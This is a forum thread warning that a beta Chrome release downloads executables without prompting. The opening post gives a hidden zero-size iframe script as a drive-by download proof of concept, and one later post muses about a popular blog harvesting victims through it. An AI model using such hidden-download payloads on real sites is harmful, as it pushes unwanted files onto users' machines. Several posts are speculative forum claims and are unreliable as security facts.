Do not use Google Chrome

By White Cuban
in Web Browser Discussion & Support

 Share

Recommended Posts

Veteran

White Cuban

Posted
Posted (edited)

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically

downloaded to the user's computer without any user prompt.

Example:

<script>

document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');

</script>

This is just insane. this should be on the news or something, im sure that right now this exploit isnt an hour old, but still. its spreading quick enough.

Careful guys

Edited by Matan Mates
Title edited. Please do not use all Caps. Thanks!
Link to comment
Share on other sites
Mentor

Lant

Posted
Posted

Bugs like that are definitely expected as it is beta, although that is a very bad one. What made me get rid of it was the sentence in the ToS saying they could publish and reproduce anything you post to the internet when using Chrome.

Link to comment
Share on other sites
Veteran

White Cuban

Posted
  • Author
Posted

im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Link to comment
Share on other sites
Grand Master

Hurmoth

Posted
Posted

Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Link to comment
Share on other sites
Proficient

39 Thieves

Posted
Posted
im looking arround, bugs are appearing everywhere. i found one i think which allows a site to connect a computer to a Zombie sleeper cell net sorta for later use in DDoS attacks, jesus christ

Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

Link to comment
Share on other sites
Veteran

White Cuban

Posted
  • Author
Posted
Uh-huh... :rolleyes:

What's next, it uploads your credit card info to a cave in Afghanistan so Al Qaeda can buy Anthrax and porn?

ehm... no.

but there is a new exploit allowing al qaeda upload anthrax through google chrome and spread it arround infidels now lol

Link to comment
Share on other sites
Grand Master

.Kompressor

Posted
Posted

it is an interesting security hole. spyware, trojans, keyloggers and zombie bots will love that bypass.

Link to comment
Share on other sites
Veteran

White Cuban

Posted
  • Author
Posted

yeah, if a guy posts about google chrome a day before

20% of his reader get it. then do the vuln on his site, if its famous blog he cant harvest thousands.

Link to comment
Share on other sites
Proficient

39 Thieves

Posted
Posted
Why, design looks like lego xD

Just curious, but might your extreme excitement and opinions on this be based in any part on a vast portion of your blog pertaining to Firefox?

lego, pokemon ball, window media player logo...the list goes on.

By the way, there is a forum dedicated to Chrome. Here is the link http://www.chrome-forums.net/phpBB3/index.php

Um...did you just create that forum?

Link to comment
Share on other sites
Grand Master

what

Posted
Posted
Of course bugs are appearing everywhere, it is a BETA. This is the first release. Can't expect it to be bug free.

Just be careful where you browse (which goes for any browser).

Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

Link to comment
Share on other sites
Mentor

+SOOPRcow MVC

Posted
  • MVC
Posted
Something as simple and obvious as being able to silently run .exe's should have been tested internally don't you think?

It doesn't say the exe is being executed, it is just being downloaded so some user interaction is still required. Don't get me wrong though, I understand how serious of an issue it is.

Link to comment
Share on other sites
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.